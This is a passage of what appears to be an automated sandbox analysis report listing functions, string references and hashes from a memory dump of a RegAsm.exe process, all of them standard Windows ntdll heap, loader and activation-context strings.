                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 032621D9, 032622B1
                                                                                          • .Local, xrefs: 032228D8
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 032621DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                          • API String ID: 0-1239276146
                                                                                          • Opcode ID: 41d6890310ddc8a27f7065acd34ce7b53463c4220f91a0c6d56a97a69ef532f3
                                                                                          • Instruction ID: 61a9b443cc44133d47541a4af7f975cfcb224b23a1e34b87fd538b924eac6c2c
                                                                                          • Opcode Fuzzy Hash: 41d6890310ddc8a27f7065acd34ce7b53463c4220f91a0c6d56a97a69ef532f3
                                                                                          • Instruction Fuzzy Hash: 68A1B33592032AEBCB24CF55DC84BA9B7B5BF58314F2849E9D809AB251D7719EC0CF90
                                                                                          Function 031EF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                          • API String ID: 0-2586055223
                                                                                          • Opcode ID: b1c42fa19277ce1ddbbee1c487ad42538e80ffd994411333f0129eaeb12b1258
                                                                                          • Instruction ID: e887da870b5384b0104260c8ecc5d45dc34e87f8eb9f58c31f9a4a9bdf600f30
                                                                                          • Opcode Fuzzy Hash: b1c42fa19277ce1ddbbee1c487ad42538e80ffd994411333f0129eaeb12b1258
                                                                                          • Instruction Fuzzy Hash: AC615776214B81AFE325DB28D844F2BB7E8FF88710F0A0468F9558B291D774E981C761
                                                                                          Function 032A11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                          • API String ID: 0-336120773
                                                                                          • Opcode ID: 9908420adc540922a0a407ce68c1cc49b3abbac424fc54126548b0dbee5ea2ba
                                                                                          • Instruction ID: b28c9e021f2ab5931ef2b0944ab9ffa39d2e2360c2d9b979071618605e672459
                                                                                          • Opcode Fuzzy Hash: 9908420adc540922a0a407ce68c1cc49b3abbac424fc54126548b0dbee5ea2ba
                                                                                          • Instruction Fuzzy Hash: 1131AA76264A21EFD710DB98C885F6AB7E9EF09B60F184155F401CB292D771EC90CA64
                                                                                          Function 031E9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                          • API String ID: 0-1391187441
                                                                                          • Opcode ID: 6ce046d841da23396564a08291bbb90dde464a80feb113d7f53dc3104477a142
                                                                                          • Instruction ID: 2d0dd734acf28716d1f4599a465cff6627ce02d2c21584bd2f46b36cf509cdfe
                                                                                          • Opcode Fuzzy Hash: 6ce046d841da23396564a08291bbb90dde464a80feb113d7f53dc3104477a142
                                                                                          • Instruction Fuzzy Hash: 0531D236610665EFCB05DB49C888FAEBBF9EF49730F144055E814AB291D775E980CB60
                                                                                          Function 032029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 03203255
                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0320327D
                                                                                          • HEAP: , xrefs: 03203264
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                          • API String ID: 0-617086771
                                                                                          • Opcode ID: 21e4ad8b0046c20b9e969ab61f92dd2cfac93fe2a2e868dc0cfc09c827d2d510
                                                                                          • Instruction ID: 26789228768d915fef13ed7cf9c00fd33b214b32299cf63bf858767611d506f8
                                                                                          • Opcode Fuzzy Hash: 21e4ad8b0046c20b9e969ab61f92dd2cfac93fe2a2e868dc0cfc09c827d2d510
                                                                                          • Instruction Fuzzy Hash: 0692DD74A24349DFDB25CF68C4447ADBBF1FF08300F18849AE959AB292D375A989CF50
                                                                                          Function 03201F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          • API String ID: 0-3178619729
                                                                                          • Opcode ID: 68062994c47ff2d4941cdedd3ea40a57542c26324f7efd5621bd4a7293d11f1e
                                                                                          • Instruction ID: 9d3b270db8d7813aed1531f9e512da0ef29ee6e9ad68f0d7c0f85205ce66c353
                                                                                          • Opcode Fuzzy Hash: 68062994c47ff2d4941cdedd3ea40a57542c26324f7efd5621bd4a7293d11f1e
                                                                                          • Instruction Fuzzy Hash: 1C22DD70620742DFDB15DF28C494B7AFBB6EF0A704F288499E8568B282D771E985CB50
                                                                                          Function 03200770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-4253913091
                                                                                          • Opcode ID: 715f2630994d3004a435e1d63cba4afc0912be9e406fffd948bbfe0bc0e457cf
                                                                                          • Instruction ID: f800b4e1057293bf38afc6bd6d4b05f8e0b386f86109792af444b316d2f8937c
                                                                                          • Opcode Fuzzy Hash: 715f2630994d3004a435e1d63cba4afc0912be9e406fffd948bbfe0bc0e457cf
                                                                                          • Instruction Fuzzy Hash: 03F1C234620606DFEB14CF68C894B6AB7F5FF45700F2481A8E8569B392D774EAC5CB90
                                                                                          Function 031F1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 031F1728
                                                                                          • HEAP[%wZ]: , xrefs: 031F1712
                                                                                          • HEAP: , xrefs: 031F1596
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                          • API String ID: 0-3178619729
                                                                                          • Opcode ID: 592a5462e3bb11cfb8eb89ecf37929f4d457bdd238925e80fd87d8e597301fa9
                                                                                          • Instruction ID: 7990ea3aee5130dcc484fc34ed7f9192aaf053e8fb714e95894d4e1f4e5191cf
                                                                                          • Opcode Fuzzy Hash: 592a5462e3bb11cfb8eb89ecf37929f4d457bdd238925e80fd87d8e597301fa9
                                                                                          • Instruction Fuzzy Hash: 7CE10330A14645EFDB28CF28C451B7ABBF5EF89310F18856DEA96CB246D774E881CB50
                                                                                          Function 031FB6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                          • API String ID: 0-1145731471
                                                                                          • Opcode ID: f5954a1a2127c9cfec54fb742f9a1b4b78b31620d6faea1d2e20069dfeba6650
                                                                                          • Instruction ID: fad718c194da26e523ca3b8a85851c75da33129c6380dc915d75ce6953e91d4b
                                                                                          • Opcode Fuzzy Hash: f5954a1a2127c9cfec54fb742f9a1b4b78b31620d6faea1d2e20069dfeba6650
                                                                                          • Instruction Fuzzy Hash: 61B1E339A287459FCB29CF59D984BADF7B5BF48354F188529EA11EB380D730E980CB00
                                                                                          Function 0327368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                          • API String ID: 0-2391371766
                                                                                          • Opcode ID: 9d9690d1ece8f384b06565f1d1d17d66955f520760493229d00577cac73618f6
                                                                                          • Instruction ID: a3bbe47c991749078c5376c84306cafb98d451e5fa92133bb7f40ce0c2ad0ee6
                                                                                          • Opcode Fuzzy Hash: 9d9690d1ece8f384b06565f1d1d17d66955f520760493229d00577cac73618f6
                                                                                          • Instruction Fuzzy Hash: 6CB1C1BA624346AFD311DE54D885F6BB7E8BB44710F044929FB509B240D7B4E884DBD2
                                                                                          Function 03216962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $@
                                                                                          • API String ID: 0-1077428164
                                                                                          • Opcode ID: a43099b958f47ebffb3e75e54f3e6a81641af57d56c225462d8ee88813168efd
                                                                                          • Instruction ID: 24deff537e916efac74e95ce505ad740be2cfd34469530f2a35cc91b91ec84ed
                                                                                          • Opcode Fuzzy Hash: a43099b958f47ebffb3e75e54f3e6a81641af57d56c225462d8ee88813168efd
                                                                                          • Instruction Fuzzy Hash: CFC2D2716283518FD725CF28C980BABB7E5AFD8704F08892DF989C7240E774D995CB92
                                                                                          Function 031EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                          • API String ID: 0-2779062949
                                                                                          • Opcode ID: de45a87ec0aeea7867ff9e750180f7d26a7dff2d8b6d912f89a880596cdcc363
                                                                                          • Instruction ID: 6f86119588d067006cd6982ef951ed93d4720b1636f691f3d9fdeee33abc6935
                                                                                          • Opcode Fuzzy Hash: de45a87ec0aeea7867ff9e750180f7d26a7dff2d8b6d912f89a880596cdcc363
                                                                                          • Instruction Fuzzy Hash: 97A19075921629ABDB31DF68CC88BE9B7B8EF48700F1401E9E909AB250D7759EC4CF50
                                                                                          Function 032836EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                          • API String ID: 0-318774311
                                                                                          • Opcode ID: dde5a267c1dbe8fe0d6ba91687c1b59bd2d07d0221716701d1e2d7e12cd3fb69
                                                                                          • Instruction ID: 55830247c55efba224946928b935bd45b18b18efab1dd7e5c317a054125bc0d8
                                                                                          • Opcode Fuzzy Hash: dde5a267c1dbe8fe0d6ba91687c1b59bd2d07d0221716701d1e2d7e12cd3fb69
                                                                                          • Instruction Fuzzy Hash: 3E818E7D629341AFE311EB14C844B6AB7E8FF85B50F080929FA909B3D0D7B4D984CB52
                                                                                          Function 0322909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %$&$@
                                                                                          • API String ID: 0-1537733988
                                                                                          • Opcode ID: 5214e31ed9a3105bf3926265663298f38b8c32672db85b519afb65761a7e2f7a
                                                                                          • Instruction ID: 4c026e6dcdd21e49c641b77217a2558786d6627b6f235671a4edec6b5265354c
                                                                                          • Opcode Fuzzy Hash: 5214e31ed9a3105bf3926265663298f38b8c32672db85b519afb65761a7e2f7a
                                                                                          • Instruction Fuzzy Hash: F771E074528312AFC714DF24C980A2BFBE9FF85708F148A1DE49A8B290C771D8D5CB92
                                                                                          Function 032CB73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • GlobalizationUserSettings, xrefs: 032CB834
                                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 032CB82A
                                                                                          • TargetNtPath, xrefs: 032CB82F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                          • API String ID: 0-505981995
                                                                                          • Opcode ID: 6139de34cc482865ae06087ad73eba8f16bb488235774a27453c6503e726de69
                                                                                          • Instruction ID: 0c86afff5c80738cffc1e4c70212118a413eef5722d6a9de570974a4bbf7cbd1
                                                                                          • Opcode Fuzzy Hash: 6139de34cc482865ae06087ad73eba8f16bb488235774a27453c6503e726de69
                                                                                          • Instruction Fuzzy Hash: 86618176961269AFDB21DF54CC89B99F7B8AF18710F0102E9E508AB250C774DEC4CF90
                                                                                          Function 031EF7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0324E6C6
                                                                                          • HEAP[%wZ]: , xrefs: 0324E6A6
                                                                                          • HEAP: , xrefs: 0324E6B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                          • API String ID: 0-1340214556
                                                                                          • Opcode ID: bd51a47f28af433d8b7a87f0a05b88b1928d318b340c79948c1ed3fcd23609f2
                                                                                          • Instruction ID: 8ff74cf82f3633030a460a05a9fcf89a5e037c3c1e3738cc81dc2f249a9a2a39
                                                                                          • Opcode Fuzzy Hash: bd51a47f28af433d8b7a87f0a05b88b1928d318b340c79948c1ed3fcd23609f2
                                                                                          • Instruction Fuzzy Hash: C7513A35614B85EFE716DB68C844F6ABBF8FF09300F0A40A4E951CB292D375E991CB10
                                                                                          Function 0329DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 0329DC12
                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0329DC32
                                                                                          • HEAP: , xrefs: 0329DC1F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                          • API String ID: 0-3815128232
                                                                                          • Opcode ID: 1ff17ef5c218fb848635cd6f95cd6068556567b2ddf967d3f452995f47d735eb
                                                                                          • Instruction ID: 96765f9aa1545622f222c34e7ed8335cb7de1d044f3c0d07fd6484e25fd5a5a1
                                                                                          • Opcode Fuzzy Hash: 1ff17ef5c218fb848635cd6f95cd6068556567b2ddf967d3f452995f47d735eb
                                                                                          • Instruction Fuzzy Hash: C85127351342518EFB64DE29C854772B3E1DF55644F08888BE4D28B185D3B6D882FB60
                                                                                          Function 0322C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 032682DE
                                                                                          • Failed to reallocate the system dirs string !, xrefs: 032682D7
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 032682E8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1783798831
                                                                                          • Opcode ID: 3091aa79e4d95b3c2ad68f11d516b4cc677724b679cfea4cc4247d18ea7c7ee4
                                                                                          • Instruction ID: e71b337775801ca5e4aebee0e201ead48f4b88aef1c0940d7dcd6da85130ef18
                                                                                          • Opcode Fuzzy Hash: 3091aa79e4d95b3c2ad68f11d516b4cc677724b679cfea4cc4247d18ea7c7ee4
                                                                                          • Instruction Fuzzy Hash: 5A4107B5574721ABC720EB64EC49B5F7BECAF48750F04492AF944DB290E7B4D880CB91
                                                                                          Function 032216CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 03261B4A
                                                                                          • LdrpAllocateTls, xrefs: 03261B40
                                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03261B39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                          • API String ID: 0-4274184382
                                                                                          • Opcode ID: 4007b6187aeac76f550a1a45d49d56f0199bbc96c21bbf8fa69ef8a8085d083c
                                                                                          • Instruction ID: c51d3bf21b7a2198e5b62e95b9ed641637338cbfdd32a426e5b2cb85bc86eb27
                                                                                          • Opcode Fuzzy Hash: 4007b6187aeac76f550a1a45d49d56f0199bbc96c21bbf8fa69ef8a8085d083c
                                                                                          • Instruction Fuzzy Hash: 59418B79A20619AFDB15DFA8CC41AAEFBF6FF49704F148119E415AB240D7B4A890CB90
                                                                                          Function 032AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • @, xrefs: 032AC1F1
                                                                                          • PreferredUILanguages, xrefs: 032AC212
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 032AC1C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                          • API String ID: 0-2968386058
                                                                                          • Opcode ID: 7f474364e17f47c9e24e0b1470cde8236dd837fdead366bbf2794e4fc503c3b2
                                                                                          • Instruction ID: e114e42b07c86114b1c26d632f32a5fa8a69b097903dc86c7f0a149c39717088
                                                                                          • Opcode Fuzzy Hash: 7f474364e17f47c9e24e0b1470cde8236dd837fdead366bbf2794e4fc503c3b2
                                                                                          • Instruction Fuzzy Hash: 45418275E2061AEFDF11DAE8C841FEEB7B8AB14700F14406AE605F7290D7B49A848B90
                                                                                          Function 03284144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                          • API String ID: 0-1373925480
                                                                                          • Opcode ID: 42cc4e1bbc6730020cc095be643ac35dbce0516fe988bdbadf5db63fc99fb2bd
                                                                                          • Instruction ID: 0a5b7ae7bbcc62c218d603e6e8bf7c533dc97e4f5606834cffe9a70d84525835
                                                                                          • Opcode Fuzzy Hash: 42cc4e1bbc6730020cc095be643ac35dbce0516fe988bdbadf5db63fc99fb2bd
                                                                                          • Instruction Fuzzy Hash: DB41233192674A8BEB21FBA6C840BACBBB8FF55740F18045AD901EF7C5D7B49981CB10
                                                                                          Function 03274755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03274888
                                                                                          • LdrpCheckRedirection, xrefs: 0327488F
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 03274899
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-3154609507
                                                                                          • Opcode ID: 9f3f0e48336ec2f2b45d449a2e3fee151d4f011b2e6efcd40a579111aa4a1e5b
                                                                                          • Instruction ID: eefd0358feb22922ef47b881fd85c612e60f11b83e5460beb5096e080675ed45
                                                                                          • Opcode Fuzzy Hash: 9f3f0e48336ec2f2b45d449a2e3fee151d4f011b2e6efcd40a579111aa4a1e5b
                                                                                          • Instruction Fuzzy Hash: D941E232A30356CFCB21EE6AE840A66B7E8FF49A50B09019DEC58DB351D370D880CB81
                                                                                          Function 032233A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() passed the empty activation context data, xrefs: 032629FE
                                                                                          • RtlCreateActivationContext, xrefs: 032629F9
                                                                                          • Actx , xrefs: 032233AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                          • API String ID: 0-859632880
                                                                                          • Opcode ID: 94c6bba4f2433052c559a738197bd6d2636df06e5d4132faa490b5bc0bfdea3c
                                                                                          • Instruction ID: d1850bfd1cd4c3ba5c7a6e8404faf4034cb9646bd1dd1a3c6740220e0ad992a3
                                                                                          • Opcode Fuzzy Hash: 94c6bba4f2433052c559a738197bd6d2636df06e5d4132faa490b5bc0bfdea3c
                                                                                          • Instruction Fuzzy Hash: 53311336620316EFDB22DE54CC84B96BBA5BF44710F194869EA059F281C7B4ECC1C790
                                                                                          Function 03221607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 03261A51
                                                                                          • LdrpInitializeTls, xrefs: 03261A47
                                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 03261A40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                          • API String ID: 0-931879808
                                                                                          • Opcode ID: 89e5ce4cf1193f88011c381268df60208041d11e2a8d50ecab22fc2f8dd01d26
                                                                                          • Instruction ID: feb626b9688fad47e6e2b47e83967f683a9d250b0a3af8a2455d33d8edf7506f
                                                                                          • Opcode Fuzzy Hash: 89e5ce4cf1193f88011c381268df60208041d11e2a8d50ecab22fc2f8dd01d26
                                                                                          • Instruction Fuzzy Hash: 6C310431A30220BFE720DB48DC4AFBE7AB8EB46748F144169E505AB180D7B4FDD48790
                                                                                          Function 03231270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0323127B
                                                                                          • @, xrefs: 032312A5
                                                                                          • BuildLabEx, xrefs: 0323130F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
